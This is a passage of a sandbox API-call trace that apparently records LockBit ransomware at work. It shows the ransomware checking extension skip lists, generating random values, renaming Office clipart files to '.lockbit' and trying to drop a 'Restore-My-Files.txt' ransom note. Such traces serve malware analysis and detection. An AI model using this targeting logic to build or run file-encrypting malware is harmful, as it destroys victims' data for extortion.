lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.008] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.008] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.008] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.008] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.008] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.008] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.008] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.008] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.008] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.009] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.009] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.009] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.009] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.009] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.009] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.009] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.009] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.009] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.009] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.009] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.009] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.009] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.010] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.010] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.010] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.010] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.010] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.010] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0251007.WMF.lockbit") returned 72 [0154.010] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0251007.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0251007.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0154.011] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.011] malloc (_Size=0x40068) returned 0x3df0008 [0154.011] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=69644) returned 1 [0154.011] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.012] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0154.012] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.012] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0154.012] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0154.018] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0251007.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0251007.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.018] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.018] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.019] free (_Block=0x1fa2ed8) [0154.019] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0251007.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.019] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.019] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.020] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f1d4200, ftCreationTime.dwHighDateTime=0x1beb2f9, ftLastAccessTime.dwLowDateTime=0x5661b6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2f1d4200, ftLastWriteTime.dwHighDateTime=0x1beb2f9, nFileSizeHigh=0x0, nFileSizeLow=0xae2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0252629.WMF", cAlternateFileName="")) returned 1 [0154.020] lstrcmpiW (lpString1=".", lpString2="J0252629.WMF") returned -1 [0154.020] lstrcmpiW (lpString1="..", lpString2="J0252629.WMF") returned -1 [0154.020] PathFindExtensionW (pszPath="J0252629.WMF") returned=".WMF" [0154.020] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.020] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.020] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.020] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.020] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.020] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.020] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.020] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.020] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.020] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.020] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.020] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.020] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.021] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.021] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.022] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.022] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.022] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.022] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.022] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.022] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.022] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.022] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.022] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.022] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.022] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.022] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.022] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.022] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.022] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0252629.WMF") returned 1 [0154.022] lstrcmpiW (lpString1="ntldr", lpString2="J0252629.WMF") returned 1 [0154.022] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0252629.WMF") returned 1 [0154.022] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0252629.WMF") returned -1 [0154.023] lstrcmpiW (lpString1="autorun.inf", lpString2="J0252629.WMF") returned -1 [0154.023] lstrcmpiW (lpString1="thumbs.db", lpString2="J0252629.WMF") returned 1 [0154.023] lstrcmpiW (lpString1="iconcache.db", lpString2="J0252629.WMF") returned -1 [0154.023] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.023] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0252629.WMF") returned=".WMF" [0154.023] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.023] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.023] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.023] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.023] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.023] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.023] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.023] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.023] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.023] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.023] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.023] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.023] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.024] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.024] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.024] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.024] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.024] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.024] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.024] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.024] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.024] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.024] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.024] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.024] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.024] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.024] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.024] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.024] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0252629.WMF.lockbit") returned 72 [0154.024] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0252629.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0252629.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0154.030] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.030] malloc (_Size=0x40068) returned 0x3d70450 [0154.030] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2786) returned 1 [0154.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.031] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0154.031] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.032] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0154.032] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0154.036] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0252629.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0252629.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.036] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.036] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.037] free (_Block=0x1fa2ed8) [0154.037] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0252629.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.037] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.037] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.037] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46f4c600, ftCreationTime.dwHighDateTime=0x1beb2f9, ftLastAccessTime.dwLowDateTime=0x5661b6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x46f4c600, ftLastWriteTime.dwHighDateTime=0x1beb2f9, nFileSizeHigh=0x0, nFileSizeLow=0xf56, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0252669.WMF", cAlternateFileName="")) returned 1 [0154.037] lstrcmpiW (lpString1=".", lpString2="J0252669.WMF") returned -1 [0154.037] lstrcmpiW (lpString1="..", lpString2="J0252669.WMF") returned -1 [0154.037] PathFindExtensionW (pszPath="J0252669.WMF") returned=".WMF" [0154.037] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.037] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.037] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.037] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.038] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.039] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.039] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.040] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.040] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0252669.WMF") returned 1 [0154.040] lstrcmpiW (lpString1="ntldr", lpString2="J0252669.WMF") returned 1 [0154.040] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0252669.WMF") returned 1 [0154.040] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0252669.WMF") returned -1 [0154.040] lstrcmpiW (lpString1="autorun.inf", lpString2="J0252669.WMF") returned -1 [0154.040] lstrcmpiW (lpString1="thumbs.db", lpString2="J0252669.WMF") returned 1 [0154.040] lstrcmpiW (lpString1="iconcache.db", lpString2="J0252669.WMF") returned -1 [0154.040] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.040] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0252669.WMF") returned=".WMF" [0154.040] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.040] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.040] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.040] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.040] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.040] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.040] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.040] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.040] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.040] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.040] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.040] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.041] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.041] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0252669.WMF.lockbit") returned 72 [0154.041] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0252669.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0252669.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0154.042] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.042] malloc (_Size=0x40068) returned 0x1ff1e60 [0154.042] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3926) returned 1 [0154.042] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.043] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0154.043] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0154.044] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.051] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0252669.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0252669.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.051] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.052] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.053] free (_Block=0x1fa2ed8) [0154.053] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0252669.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.053] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.053] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.053] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89b5600, ftCreationTime.dwHighDateTime=0x1bec0f4, ftLastAccessTime.dwLowDateTime=0x660f04f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe89b5600, ftLastWriteTime.dwHighDateTime=0x1bec0f4, nFileSizeHigh=0x0, nFileSizeLow=0xf6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0278702.WMF", cAlternateFileName="")) returned 1 [0154.053] lstrcmpiW (lpString1=".", lpString2="J0278702.WMF") returned -1 [0154.053] lstrcmpiW (lpString1="..", lpString2="J0278702.WMF") returned -1 [0154.053] PathFindExtensionW (pszPath="J0278702.WMF") returned=".WMF" [0154.053] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.053] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.054] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.054] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.054] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.054] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned 